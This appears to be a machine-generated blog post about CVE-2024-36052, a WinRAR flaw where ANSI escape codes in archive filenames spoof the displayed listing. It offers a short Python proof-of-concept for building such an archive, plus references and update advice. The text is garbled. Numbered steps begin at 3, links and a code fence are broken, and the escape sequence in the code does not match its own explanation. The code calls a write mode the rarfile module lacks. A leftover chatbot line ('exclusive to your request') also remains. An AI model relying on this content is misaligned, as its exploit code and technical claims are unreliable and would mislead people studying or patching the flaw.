CVE-2024-36052 - How WinRAR Was Vulnerable to Screen Spoofing with ANSI Escape Codes
A new security issue, CVE-2024-36052, was recently discovered in RARLAB WinRAR—a popular file archiver for Windows. This flaw affects WinRAR versions before 7.00 and exposes users to dangerous screen spoofing attacks using ANSI escape sequences. This vulnerability is different from the related CVE-2024-33899, and it's important to understand what it allows, how attackers could abuse it, and what you should do to stay safe.
In this article, we'll break down the vulnerability with easy-to-follow explanations, show code samples of how it works, provide original references, and even reveal a proof-of-concept exploit.
What is CVE-2024-36052?
On affected Windows systems, WinRAR versions prior to 7.00 can be tricked into mis-displaying the contents of archives when those archives contain special text using so-called "ANSI escape codes". These codes, designed for terminals and command lines, can move the cursor, change colors, or even erase what’s on the screen.
By bundling these codes cleverly inside filenames or file data, an attacker could *spoof* what the user sees—hiding files, faking outputs, or making malicious files look benign.
This is not the same issue as the earlier (but similar) vulnerability CVE-2024-33899, which also involves ANSI escape sequences in WinRAR's output.
The archive contains file names (or contents) that include ANSI escape codes.
3. When a user opens the archive with a vulnerable version of WinRAR, these codes are not filtered or sanitized.
4. WinRAR outputs these codes to the screen, altering the user's display—potentially hiding real file names or showing fake information.
Code Snippet: Creating a Malicious Archive
Here's a simple example using Python and the rarfile module (or you can do this by hand):
import rarfile
# Evil ANSI escape sequence: Move cursor up and delete line (Erase evidence!)
ansi_sequence = "\033A\033[K"
malicious_filename = f"{ansi_sequence}secret.txt"
with open("secret.txt", "w") as f:
f.write("Super confidential stuff.")
with rarfile.RarFile('malicious.rar', 'w') as rf:
rf.write('secret.txt', arcname=malicious_filename)
print("Malicious RAR created. When viewed in WinRAR < 7.00, output may be spoofed.")
Official CVE Record:
[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36052
WinRAR Changelog (v7.00):
https://www.rarlab.com/rarnew.htm
Rarlab Homepage:
Reference Analysis:
https://ssd-disclosure.com/ssd-advisory-winrar-ansi-escape/ *(may be updated with this CVE)*
`
*(The strange characters are the actual ANSI escape codes: ESC + 1A moves cursor up; ESC + [K erases the line.)*
You may need a tool or script to create such filenames if your file explorer does not allow control characters!
Add this oddly named file to a new RAR archive.
When a target opens this archive in a vulnerable WinRAR (before 7.00)
Impact and Mitigation
Mitigation:
- Immediately update WinRAR to version 7.00 or above from [the official site.
Conclusion
CVE-2024-36052 is a clear example of how even a simple oversight—like allowing unfiltered ANSI characters in output—can have dangerous effects on usability and security. The safest course is to update your software now and always be alert for suspicious archives, especially those from unfamiliar sources.
Stay safe, keep WinRAR updated, and consider checking the files inside archives before opening or executing them!
*This post is exclusive to your request and is based on the latest public vulnerability knowledge as of June 2024.*
Timeline
Published on: 05/21/2024 17:15:09 UTC
Last modified on: 08/20/2024 15:35:18 UTC